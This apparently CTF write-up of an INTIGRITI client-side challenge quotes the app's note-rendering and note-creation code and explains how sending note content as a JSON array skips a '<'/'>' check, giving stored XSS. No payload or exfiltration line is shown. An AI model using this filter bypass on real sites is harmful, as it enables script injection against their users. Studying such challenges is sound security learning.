“Welcome to Leaky Flagment” or…“Welcome to client-side hell” :)

“Welcome to Leaky Flagment” or…“Welcome to client-side hell” :)

Introduction

This was one of the hardest INTIGRITI’s challenges I’ve ever completed. It involved client-side vulnerabilities (such as Cross-Site Scripting, browser cache poisoning), and many business logic flaws. I learned a lot from it, so huge congrats to @0x999 for this beautiful challenge!


Goal

ℹ️ Information & Goal

Your goal is to leak the Bot's flag to a remote host by submitting a URL, below are the sequence of actions the bot will perform after receiving a URL:

Solution

Let’s cut to the chase. We’re diving into the challenge solution starting with little to no context, so that even this tough challenge will seem “”relatively easy”” ( - I’m not lazy). Do not worry, I’ll give context as soon as needed.

Uploading a malicious note 📝

In this application we can authenticate ourself and create (and view) our personal notes. These notes are private, meaning only the person who created them can see them (will that be true though?).

The first thing we notice in the code relative to the view of a single note, is the following snippet:

<CardContent className="flex-1 pt-6 border-t border-rose-100">
  <div className="bg-white/80 backdrop-blur-sm p-8 rounded-xl border border-rose-200 shadow-sm min-h-[400px]">
    <div
      className="prose max-w-none text-gray-700 whitespace-pre-wrap break-words"
      dangerouslySetInnerHTML={{ __html: note.content }}
    />
  </div>
</CardContent>

dangerouslySetInnerHTML huh? This is a XSS sink and, if not protected properly, this might be useful. Therefore, let’s see how a note is created using the /api/post endpoint.

case 'POST':
    try {
        let secret_cookie;
        
        // [Cookie retrieval and checks]
        // Returns if the cookie is incorrect
        // ...
        
        const content_type = req.headers['content-type'];
        if (content_type && !content_type.startsWith('application/json')) {
            return res.status(400).json({ message: 'Invalid content type' });
        }

The first interesting check it makes is the one relative to the content-type: if the content_type exists and is different from application/json this will throw a 400 status code, preventing us to create the note.

			// [Validates the user's secret (cookie) by retrieving the associated user data 
			// from Redis using a key generated from the cookie. If no user data is found, 
			// it returns a 403 Unauthorized response.]
			// ...
			
			const body = typeof req.body === 'string' ? JSON.parse(req.body) : req.body;
			const { title, content, use_password } = body;
			if (!title || !content) {
			    return res.status(400).json({ message: 'Please provide a title and content' });
			}
			if (typeof content === 'string' && (content.includes('<') || content.includes('>'))) {
			    return res.status(400).json({ message: 'Invalid value for title or content' });
			}
			if (title.length > 50 || content.length > 1000) {
			    return res.status(400).json({ message: 'Title must not exceed 50 characters and content must not exceed 500 characters' });
			}

Other important checks are the ones above: it parses the request body and validates that both title and content are provided; it checks for invalid HTML tags in the content to prevent uploading notes with potential XSS payloads; validates that the title and content don't exceed the specified length limits.

Is the XSS prevention mechanism properly implemented? Of course not. It's easily bypassed by sending the note content as an array, which effectively skips the HTML tag check.

After that, the note is successfully uploaded to Redis, which results in having a stored XSS on the server.